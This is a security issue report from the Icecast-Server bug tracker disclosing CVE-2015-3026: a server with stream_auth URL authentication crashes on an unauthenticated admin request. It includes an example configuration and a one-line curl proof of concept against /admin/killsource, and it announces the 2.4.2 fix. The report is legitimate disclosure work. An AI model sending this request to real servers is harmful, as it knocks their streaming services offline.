Icecast can be crashed remotely if stream_auth is enabled. (#2191) · Issues · Xiph.Org / Icecast-Server

Icecast can be crashed remotely if stream_auth is enabled.

Downstream bug report: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=782120

Icecast can be killed by anyone with a simple HTTP request when is used and a stream_auth handler is defined.

Example configuration:

<mount>
  <mount-name>/test.ogg</mount-name>
  <authentication type="url">
    <option name="stream_auth" value="http://localhost/auth"/>
  </authentication>
</mount>

Proof of concept exploit:

curl "http://stream.example.org:8000/admin/killsource?mount=/test.ogg"

This happens if no logon credentials are sent with the request. The crash happens regardless of a source client being connected to the vulnerable mountpoint.

This will be released in a security release 2.4.2 today.

CVE-2015-3026